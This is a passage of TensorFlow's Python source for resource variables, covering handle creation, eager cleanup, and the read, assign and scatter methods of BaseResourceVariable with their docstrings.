dtype,
shared_name,
name,
graph_mode,
initial_value=None):
"""Create a variable handle, copying in handle data from `initial_value`."""
container = ops.get_default_graph()._container # pylint: disable=protected-access
if container is None:
container = ""
shape = tensor_shape.as_shape(shape)
dtype = dtypes.as_dtype(dtype)
if not graph_mode:
if shared_name is not None:
raise errors.InternalError( # pylint: disable=no-value-for-parameter
"Using an explicit shared_name is not allowed when executing eagerly."
)
shared_name = context.anonymous_name()
handle = gen_resource_variable_ops.var_handle_op(
shape=shape,
dtype=dtype,
shared_name=shared_name,
name=name,
container=container)
if initial_value is None:
initial_value = handle
if graph_mode:
full_handle_data = _combine_handle_data(handle, initial_value)
_set_handle_shapes_and_types(handle, full_handle_data, graph_mode)
return handle
else:
handle_data = cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData()
handle_data.is_set = True
handle_data.shape_and_type.append(
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleShapeAndType(
shape=shape.as_proto(), dtype=dtype.as_datatype_enum))
if initial_value is not None and initial_value.dtype == dtypes.variant:
extra_handle_data = get_eager_safe_handle_data(initial_value)
if extra_handle_data is not None and extra_handle_data.is_set:
if (not handle_data.is_set or len(handle_data.shape_and_type) != 1):
raise RuntimeError(
"Expected VarHandleOp to return a length==1 shape_and_type, "
f"but saw: '{handle_data}'")
handle_data.shape_and_type.extend(extra_handle_data.shape_and_type)
_set_handle_shapes_and_types(handle, handle_data, graph_mode)
return handle
def eager_safe_variable_handle(initial_value, shape, shared_name, name,
graph_mode):
"""Creates a variable handle with information to do shape inference.
The dtype is read from `initial_value` and stored in the returned
resource tensor's handle data.
If `initial_value.dtype == tf.variant`, we additionally extract the handle
data (if any) from `initial_value` and append it to the `handle_data`.
In this case, the returned tensor's handle data is in the form
```
is_set: true
shape_and_type {
shape {
// initial_value.shape
}
dtype: DT_VARIANT
}
shape_and_type {
// handle_data(initial_value).shape_and_type[0]
}
shape_and_type {
// handle_data(initial_value).shape_and_type[1]
}
...
```
Ops that read from this tensor, such as `ReadVariableOp` and
`AssignVariableOp`, know that `handle_data(handle).shape_and_type[1:]`
correspond to the handle data of the variant(s) stored in the Variable.
Args:
initial_value: A `Tensor`.
shape: The shape of the handle data. Can be `TensorShape(None)` (i.e.
unknown shape).
shared_name: A string.
name: A string.
graph_mode: A python bool.
Returns:
The handle, a `Tensor` of type `resource`.
"""
dtype = initial_value.dtype.base_dtype
return _variable_handle_from_shape_and_dtype(shape, dtype, shared_name, name,
graph_mode, initial_value)
@contextlib.contextmanager
def _handle_graph(handle):
# Note: might have an eager tensor but not be executing eagerly when building
# functions.
if (context.executing_eagerly() or isinstance(handle, ops.EagerTensor) or
ops.has_default_graph()):
yield
else:
with handle.graph.as_default():
yield
class EagerResourceDeleter:
"""An object which cleans up a resource handle.
An alternative to defining a __del__ method on an object. The intended use is
that ResourceVariables or other objects with resource handles will maintain a
single reference to this object. When the parent object is collected, this
object will be too. Even if the parent object is part of a reference cycle,
the cycle will be collectable.
"""
__slots__ = ["_handle", "_handle_device", "_context"]
def __init__(self, handle, handle_device):
if not isinstance(handle, ops.Tensor):
raise ValueError(
(f"Passed handle={handle} to EagerResourceDeleter. Was expecting "
f"the handle to be a `tf.Tensor`."))
self._handle = handle
self._handle_device = handle_device
# This is held since the __del__ function runs an op, and if the context()
# is collected before this object, there will be a segfault when running the
# op.
self._context = context.context()
def __del__(self):
# Resources follow object-identity when executing eagerly, so it is safe to
# delete the resource we have a handle to.
try:
# A packed EagerTensor doesn't own any resource.
if isinstance(self._handle, ops.EagerTensor) and self._handle.is_packed:
return
# This resource was created in eager mode. However, this destructor may be
# running in graph mode (especially during unit tests). To clean up
# successfully, we switch back into eager mode temporarily.
with context.eager_mode():
with ops.device(self._handle_device):
gen_resource_variable_ops.destroy_resource_op(
self._handle, ignore_lookup_error=True)
except TypeError:
# Suppress some exceptions, mainly for the case when we're running on
# module deletion. Things that can go wrong include the context module
# already being unloaded, self._handle._handle_data no longer being
# valid, and so on. Printing warnings in these cases is silly
# (exceptions raised from __del__ are printed as warnings to stderr).
pass # 'NoneType' object is not callable when the handle has been
# partially unloaded.
except AttributeError:
pass # 'NoneType' object has no attribute 'eager_mode' when context has
# been unloaded. Will catch other module unloads as well.
def shape_safe_assign_variable_handle(handle, shape, value, name=None):
"""Helper that checks shape compatibility and assigns variable."""
with _handle_graph(handle):
value_tensor = ops.convert_to_tensor(value)
shape.assert_is_compatible_with(value_tensor.shape)
return gen_resource_variable_ops.assign_variable_op(
handle, value_tensor, name=name)
def _maybe_set_handle_data(dtype, handle, tensor):
if dtype == dtypes.variant:
# For DT_VARIANT types, the handle's shape_and_type[1:] stores the
# variant's handle data. Extract it.
handle_data = get_eager_safe_handle_data(handle)
if handle_data.is_set and len(handle_data.shape_and_type) > 1:
tensor._handle_data = ( # pylint: disable=protected-access
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData(
is_set=True, shape_and_type=handle_data.shape_and_type[1:]))
def variable_accessed(variable):
"""Records that `variable` was accessed for the tape and FuncGraph."""
if hasattr(ops.get_default_graph(), "watch_variable"):
ops.get_default_graph().watch_variable(variable)
if variable.trainable:
tape.variable_accessed(variable)
class BaseResourceVariable(variables.VariableV1, core.Tensor):
"""A python variable from an existing handle."""
# TODO(wangpeng): Deprecate `constraint` when callers no long pass it in.
def __init__( # pylint: disable=super-init-not-called
self,
trainable=None,
shape=None,
dtype=None,
handle=None,
constraint=None,
synchronization=None,
aggregation=None,
distribute_strategy=None,
name=None,
unique_id=None,
handle_name=None,
graph_element=None,
initial_value=None,
initializer_op=None,
is_initialized_op=None,
cached_value=None,
save_slice_info=None,
caching_device=None,
in_graph_mode=None,
**unused_kwargs):
"""Creates a variable from a handle.
Args:
trainable: If `True`, GradientTapes automatically watch uses of this
Variable.
shape: The variable's shape. This shape can be set to tf.TensorShape(None)
in order to assign values of different shapes to this variable.
Otherwise (i.e. if the shape is fully determined), it will trigger run
time checks to ensure that each assignment is of the same shape.
dtype: The variable's dtype.
handle: The variable's handle
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
distribute_strategy: The distribution strategy this variable was created
under.
name: The name for this variable.
unique_id: Internal. Unique ID for this variable's handle.
handle_name: The name for the variable's handle.
graph_element: Optional, required only in session.run-mode. Pre-created
tensor which reads this variable's value.
initial_value: Optional. Variable's initial value.
initializer_op: Operation which assigns the variable's initial value.
is_initialized_op: Pre-created operation to check whether this variable is
initialized.
cached_value: Pre-created operation to read this variable in a specific
device.
save_slice_info: Metadata for variable partitioning.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
in_graph_mode: whether we are executing in TF1 graph mode. If None, will
detect within the function. This is to avoid repeated init_scope()
        context entrances which can add up.
"""
if in_graph_mode is None:
with ops.init_scope():
self._in_graph_mode = not context.executing_eagerly()
else:
self._in_graph_mode = in_graph_mode
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
self._trainable = trainable
self._synchronization = synchronization
self._aggregation = aggregation
self._save_slice_info = save_slice_info
self._initial_value = initial_value
self._initializer_op = initializer_op
self._is_initialized_op = is_initialized_op
self._graph_element = graph_element
self._caching_device = caching_device
self._cached_value = cached_value
self._distribute_strategy = distribute_strategy
# Store the graph key so optimizers know how to only retrieve variables from
# this graph. Guaranteed to be the same as the eager graph_key.
self._graph_key = ops.get_default_graph()._graph_key # pylint: disable=protected-access
self._shape = tensor_shape.as_shape(shape)
self._dtype = dtypes.as_dtype(dtype)
self._handle = handle
self._unique_id = unique_id
self._handle_name = handle_name + ":0"
self._constraint = constraint
self._cached_shape_as_list = None
def __repr__(self):
if context.executing_eagerly() and not self._in_graph_mode:
# If we cannot read the value for any reason (e.g. variable uninitialized
# during tf.function tracing), still produce a __repr__. Note that for
# async eager, errors due to uninitialized variables will raise in
# ops.value_text when the handle is resolved, so we need to keep that
# under the try...except if we want to suppress them.
try:
with ops.device(self.device):
value_text = ops.value_text(self.read_value(), is_repr=True)
except: # pylint: disable=bare-except
value_text = "numpy=<unavailable>"
return "<tf.Variable '%s' shape=%s dtype=%s, %s>" % (
self.name, self.get_shape(), self.dtype.name, value_text)
else:
return "<tf.Variable '%s' shape=%s dtype=%s>" % (
self.name, self.get_shape(), self.dtype.name)
def __tf_tracing_type__(self, signature_context):
return signature_context.make_reference_type(
VariableSpec(self.shape, self.dtype), self._handle._id) # pylint:disable=protected-access
@contextlib.contextmanager
def _assign_dependencies(self):
"""Makes assignments depend on the cached value, if any.
This prevents undefined behavior with reads not ordered wrt writes.
Yields:
None.
"""
if self._cached_value is not None:
with ops.control_dependencies([self._cached_value]):
yield
else:
yield
def __array__(self, dtype=None):
"""Allows direct conversion to a numpy array.
>>> np.array(tf.Variable([1.0]))
array([1.], dtype=float32)
Returns:
The variable value as a numpy array.
"""
# You can't return `self.numpy()` here because for scalars
# that raises:
# ValueError: object __array__ method not producing an array
# Even `self.read_value().__array__()` and `self.read_value()._numpy()` give
# the same error. The `EagerTensor` class must be doing something behind the
# scenes to make `np.array(tf.constant(1))` work.
return np.asarray(self.numpy(), dtype=dtype)
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return bool(self.read_value())
def __copy__(self):
return self
def __deepcopy__(self, memo):
if not context.executing_eagerly():
raise NotImplementedError(
"__deepcopy__() is only available when eager execution is enabled.")
copied_variable = ResourceVariable(
initial_value=self.read_value(),
trainable=self._trainable,
constraint=self._constraint,
dtype=self._dtype,
name=self._shared_name,
distribute_strategy=self._distribute_strategy,
synchronization=self.synchronization,
aggregation=self.aggregation)
memo[self._unique_id] = copied_variable
return copied_variable
@property
def dtype(self):
"""The dtype of this variable."""
return self._dtype
@property
def device(self):
"""The device this variable is on."""
return self.handle.device
@property
def graph(self):
"""The `Graph` of this variable."""
return self.handle.graph
@property
def name(self):
"""The name of the handle for this variable."""
return self._handle_name
@property
def shape(self):
"""The shape of this variable."""
return self._shape
def set_shape(self, shape):
self._shape = self._shape.merge_with(shape)
def _shape_as_list(self):
if self.shape.ndims is None:
return None
return [dim.value for dim in self.shape.dims]
def _shape_tuple(self):
shape = self._shape_as_list()
if shape is None:
return None
return tuple(shape)
@property
def create(self):
"""The op responsible for initializing this variable."""
if not self._in_graph_mode:
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return self._initializer_op
@property
def handle(self):
"""The handle by which this variable can be accessed."""
return self._handle
def value(self):
"""A cached operation which reads the value of this variable."""
if self._cached_value is not None:
return self._cached_value
with ops.colocate_with(None, ignore_existing=True):
return self._read_variable_op()
def _as_graph_element(self):
"""Conversion function for Graph.as_graph_element()."""
return self._graph_element
@property
def initializer(self):
"""The op responsible for initializing this variable."""
return self._initializer_op
@property
def initial_value(self):
"""Returns the Tensor used as the initial value for the variable."""
if context.executing_eagerly():
raise RuntimeError("This property is not supported "
"when eager execution is enabled.")
return self._initial_value
@property
def constraint(self):
"""Returns the constraint function associated with this variable.
Returns:
The constraint function that was passed to the variable constructor.
Can be `None` if no constraint was passed.
"""
return self._constraint
@property
def op(self):
"""The op for this variable."""
return self.handle.op
@property
def trainable(self):
return self._trainable
@property
def synchronization(self):
return self._synchronization
@property
def aggregation(self):
return self._aggregation
def eval(self, session=None):
"""Evaluates and returns the value of this variable."""
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return self._graph_element.eval(session=session)
def numpy(self):
if context.executing_eagerly():
return self.read_value().numpy()
raise NotImplementedError(
"numpy() is only available when eager execution is enabled.")
@deprecated(None, "Prefer Dataset.range instead.")
def count_up_to(self, limit):
"""Increments this variable until it reaches `limit`.
When that Op is run it tries to increment the variable by `1`. If
incrementing the variable would bring it above `limit` then the Op raises
the exception `OutOfRangeError`.
If no error is raised, the Op outputs the value of the variable before
the increment.
This is essentially a shortcut for `count_up_to(self, limit)`.
Args:
limit: value at which incrementing the variable raises an error.
Returns:
A `Tensor` that will hold the variable value before the increment. If no
other Op modifies this variable, the values produced will all be
distinct.
"""
return gen_state_ops.resource_count_up_to(
self.handle, limit=limit, T=self.dtype)
def _map_resources(self, save_options):
"""For implementing `Trackable`."""
new_variable = None
if save_options.experimental_variable_policy._save_variable_devices(): # pylint:disable=protected-access
with ops.device(self.device):
new_variable = copy_to_graph_uninitialized(self)
else:
new_variable = copy_to_graph_uninitialized(self)
obj_map = {self: new_variable}
resource_map = {self.handle: new_variable.handle}
return obj_map, resource_map
def _read_variable_op(self):
variable_accessed(self)
def read_and_set_handle():
result = gen_resource_variable_ops.read_variable_op(
self.handle, self._dtype)
_maybe_set_handle_data(self._dtype, self.handle, result)
return result
if getattr(self, "_caching_device", None) is not None:
with ops.colocate_with(None, ignore_existing=True):
with ops.device(self._caching_device):
result = read_and_set_handle()
else:
result = read_and_set_handle()
if not context.executing_eagerly():
# Note that if a control flow context is active the input of the read op
# might not actually be the handle. This line bypasses it.
tape.record_operation(
"ReadVariableOp", [result], [self.handle],
backward_function=lambda x: [x],
forward_function=lambda x: [x])
return result
def read_value(self):
"""Constructs an op which reads the value of this variable.
Should be used when there are multiple reads, or when it is desirable to
read the value only after some condition is true.
Returns:
the read operation.
"""
with ops.name_scope("Read"):
value = self._read_variable_op()
# Return an identity so it can get placed on whatever device the context
# specifies instead of the device where the variable is.
return array_ops.identity(value)
def sparse_read(self, indices, name=None):
"""Reads the value of this variable sparsely, using `gather`."""
with ops.name_scope("Gather" if name is None else name) as name:
variable_accessed(self)
value = gen_resource_variable_ops.resource_gather(
self.handle, indices, dtype=self._dtype, name=name)
if self._dtype == dtypes.variant:
# For DT_VARIANT types, the handle's shape_and_type[1:] stores the
# variant's handle data. Extract it.
handle_data = get_eager_safe_handle_data(self.handle)
if handle_data.is_set and len(handle_data.shape_and_type) > 1:
value._handle_data = ( # pylint: disable=protected-access
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData(
is_set=True, shape_and_type=handle_data.shape_and_type[1:]))
return array_ops.identity(value)
def gather_nd(self, indices, name=None):
"""Reads the value of this variable sparsely, using `gather_nd`."""
with ops.name_scope("GatherNd" if name is None else name) as name:
if self.trainable:
variable_accessed(self)
value = gen_resource_variable_ops.resource_gather_nd(
self.handle, indices, dtype=self._dtype, name=name)
return array_ops.identity(value)
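
  # A hedged usage sketch (illustrative, eager mode, public API): sparse_read()
  # gathers whole rows by index, and gather_nd() generalizes this to index
  # tuples. For a variable backed by this class:
  #   >>> v = tf.Variable([[1., 2.], [3., 4.], [5., 6.]])
  #   >>> v.sparse_read([2, 0]).numpy()
  #   array([[5., 6.],
  #          [1., 2.]], dtype=float32)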
def to_proto(self, export_scope=None):
"""Converts a `ResourceVariable` to a `VariableDef` protocol buffer.
Args:
export_scope: Optional `string`. Name scope to remove.
Raises:
RuntimeError: If run in EAGER mode.
Returns:
A `VariableDef` protocol buffer, or `None` if the `Variable` is not
in the specified name scope.
"""
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
if export_scope is None or self.handle.name.startswith(export_scope):
var_def = variable_pb2.VariableDef()
var_def.variable_name = ops.strip_name_scope(self.handle.name,
export_scope)
if self._initial_value is not None:
# This is inside an if-statement for backwards compatibility, since
# self._initial_value might be None for variables constructed from old
# protos.
var_def.initial_value_name = ops.strip_name_scope(
self._initial_value.name, export_scope)
var_def.initializer_name = ops.strip_name_scope(self.initializer.name,
export_scope)
if self._cached_value is not None:
var_def.snapshot_name = ops.strip_name_scope(self._cached_value.name,
export_scope)
else:
# Store the graph_element here
var_def.snapshot_name = ops.strip_name_scope(self._graph_element.name,
export_scope)
var_def.is_resource = True
var_def.trainable = self.trainable
var_def.synchronization = self.synchronization.value
var_def.aggregation = self.aggregation.value
if self._save_slice_info:
var_def.save_slice_info_def.MergeFrom(
self._save_slice_info.to_proto(export_scope=export_scope))
return var_def
else:
return None
@staticmethod
def from_proto(variable_def, import_scope=None):
if context.executing_eagerly():
raise RuntimeError("This operation is not supported "
"when eager execution is enabled.")
return ResourceVariable(
variable_def=variable_def, import_scope=import_scope)
__array_priority__ = 100
def is_initialized(self, name=None):
"""Checks whether a resource variable has been initialized.
Outputs boolean scalar indicating whether the tensor has been initialized.
Args:
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
return gen_resource_variable_ops.var_is_initialized_op(self.handle, name)
def assign_sub(self, delta, use_locking=None, name=None, read_value=True):
"""Subtracts a value from this variable.
Args:
delta: A `Tensor`. The value to subtract from this variable.
use_locking: If `True`, use locking during the operation.
name: The name to use for the operation.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
# TODO(apassos): this here and below is not atomic. Consider making it
# atomic if there's a way to do so without a performance cost for those who
# don't need it.
with _handle_graph(self.handle), self._assign_dependencies():
assign_sub_op = gen_resource_variable_ops.assign_sub_variable_op(
self.handle,
ops.convert_to_tensor(delta, dtype=self.dtype),
name=name)
if read_value:
return self._lazy_read(assign_sub_op)
return assign_sub_op
def assign_add(self, delta, use_locking=None, name=None, read_value=True):
"""Adds a value to this variable.
Args:
delta: A `Tensor`. The value to add to this variable.
use_locking: If `True`, use locking during the operation.
name: The name to use for the operation.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
with _handle_graph(self.handle), self._assign_dependencies():
assign_add_op = gen_resource_variable_ops.assign_add_variable_op(
self.handle,
ops.convert_to_tensor(delta, dtype=self.dtype),
name=name)
if read_value:
return self._lazy_read(assign_add_op)
return assign_add_op
def _lazy_read(self, op):
variable_accessed(self)
return _UnreadVariable(
handle=self.handle,
dtype=self.dtype,
shape=self._shape,
in_graph_mode=self._in_graph_mode,
parent_op=op,
unique_id=self._unique_id)
def assign(self, value, use_locking=None, name=None, read_value=True):
"""Assigns a new value to this variable.
Args:
value: A `Tensor`. The new value for this variable.
use_locking: If `True`, use locking during the assignment.
name: The name to use for the assignment.
read_value: A `bool`. Whether to read and return the new value of the
variable or not.
Returns:
If `read_value` is `True`, this method will return the new value of the
variable after the assignment has completed. Otherwise, when in graph mode
it will return the `Operation` that does the assignment, and when in eager
mode it will return `None`.
"""
# Note: not depending on the cached value here since this can be used to
# initialize the variable.
with _handle_graph(self.handle):
value_tensor = ops.convert_to_tensor(value, dtype=self.dtype)
if not self._shape.is_compatible_with(value_tensor.shape):
if self.name is None:
tensor_name = ""
else:
tensor_name = " " + str(self.name)
raise ValueError(
(f"Cannot assign value to variable '{tensor_name}': Shape mismatch."
f"The variable shape {self._shape}, and the "
f"assigned value shape {value_tensor.shape} are incompatible."))
kwargs = {}
if forward_compat.forward_compatible(2022, 3, 23):
# If the shape is fully defined, we do a runtime check with the shape of
# value.
validate_shape = self._shape.is_fully_defined()
kwargs["validate_shape"] = validate_shape
assign_op = gen_resource_variable_ops.assign_variable_op(
self.handle, value_tensor, name=name, **kwargs)
if read_value:
return self._lazy_read(assign_op)
return assign_op
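
  # A hedged usage sketch (illustrative, eager mode, public API): the three
  # assignment methods above compose as expected on a `tf.Variable`:
  #   >>> v = tf.Variable([1.0, 2.0])
  #   >>> v.assign([3.0, 4.0]); v.assign_add([1.0, 1.0]); v.assign_sub([0.5, 0.5])
  #   >>> v.numpy()
  #   array([3.5, 4.5], dtype=float32)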
def __reduce__(self):
# The implementation mirrors that of __deepcopy__.
return functools.partial(
ResourceVariable,
initial_value=self.numpy(),
trainable=self.trainable,
name=self._shared_name,
dtype=self.dtype,
constraint=self.constraint,
distribute_strategy=self._distribute_strategy), ()
def scatter_sub(self, sparse_delta, use_locking=False, name=None):
"""Subtracts `tf.IndexedSlices` from this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be subtracted from this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_sub(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_add(self, sparse_delta, use_locking=False, name=None):
"""Adds `tf.IndexedSlices` to this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be added to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_add(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
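
  # A hedged usage sketch (illustrative, eager mode): scatter_sub/scatter_add
  # apply an update only at the rows named by the `tf.IndexedSlices` indices:
  #   >>> v = tf.Variable([1., 2., 3.])
  #   >>> delta = tf.IndexedSlices(values=tf.constant([10., 20.]),
  #   ...                          indices=tf.constant([0, 2]))
  #   >>> v.scatter_add(delta).numpy()
  #   array([11.,  2., 23.], dtype=float32)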
def scatter_max(self, sparse_delta, use_locking=False, name=None):
"""Updates this variable with the max of `tf.IndexedSlices` and itself.
Args:
sparse_delta: `tf.IndexedSlices` to use as an argument of max with this
variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_max(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_min(self, sparse_delta, use_locking=False, name=None):
"""Updates this variable with the min of `tf.IndexedSlices` and itself.
Args:
sparse_delta: `tf.IndexedSlices` to use as an argument of min with this
variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_min(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_mul(self, sparse_delta, use_locking=False, name=None):
"""Multiply this variable by `tf.IndexedSlices`.
Args:
sparse_delta: `tf.IndexedSlices` to multiply this variable by.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_mul(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_div(self, sparse_delta, use_locking=False, name=None):
"""Divide this variable by `tf.IndexedSlices`.
Args:
sparse_delta: `tf.IndexedSlices` to divide this variable by.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_div(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def scatter_update(self, sparse_delta, use_locking=False, name=None):
"""Assigns `tf.IndexedSlices` to this variable.
Args:
sparse_delta: `tf.IndexedSlices` to be assigned to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
gen_resource_variable_ops.resource_scatter_update(
self.handle,
sparse_delta.indices,
ops.convert_to_tensor(sparse_delta.values, self.dtype),
name=name))
def batch_scatter_update(self, sparse_delta, use_locking=False, name=None):
"""Assigns `tf.IndexedSlices` to this variable batch-wise.
Analogous to `batch_gather`. This assumes that this variable and the
sparse_delta IndexedSlices have a series of leading dimensions that are the
same for all of them, and the updates are performed on the last dimension of
indices. In other words, the dimensions should be the following:
`num_prefix_dims = sparse_delta.indices.ndims - 1`
`batch_dim = num_prefix_dims + 1`
`sparse_delta.updates.shape = sparse_delta.indices.shape + var.shape[
batch_dim:]`
where
`sparse_delta.updates.shape[:num_prefix_dims]`
`== sparse_delta.indices.shape[:num_prefix_dims]`
`== var.shape[:num_prefix_dims]`
And the operation performed can be expressed as:
`var[i_1, ..., i_n,
sparse_delta.indices[i_1, ..., i_n, j]] = sparse_delta.updates[
i_1, ..., i_n, j]`
When sparse_delta.indices is a 1D tensor, this operation is equivalent to
`scatter_update`.
    To avoid this operation one can loop over the first `ndims` of the
    variable and use `scatter_update` on the subtensors that result from slicing
the first dimension. This is a valid option for `ndims = 1`, but less
efficient than this implementation.
Args:
sparse_delta: `tf.IndexedSlices` to be assigned to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
state_ops.batch_scatter_update(
self,
sparse_delta.indices,
sparse_delta.values,
use_locking=use_locking,
name=name))
def scatter_nd_sub(self, indices, updates, name=None):
"""Applies sparse subtraction to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
    For example, say we want to subtract 4 scattered elements from a rank-1
    tensor with 8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
op = ref.scatter_nd_sub(indices, updates)
with tf.compat.v1.Session() as sess:
          print(sess.run(op))
```
The resulting update to ref would look like this:
[1, -9, 3, -6, -6, 6, 7, -4]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_sub(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_add(self, indices, updates, name=None):
"""Applies sparse addition to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
    For example, say we want to add 4 scattered elements to a rank-1 tensor
    with 8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
add = ref.scatter_nd_add(indices, updates)
with tf.compat.v1.Session() as sess:
          print(sess.run(add))
```
The resulting update to ref would look like this:
[1, 13, 3, 14, 14, 6, 7, 20]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_add(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_update(self, indices, updates, name=None):
"""Applies sparse assignment to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
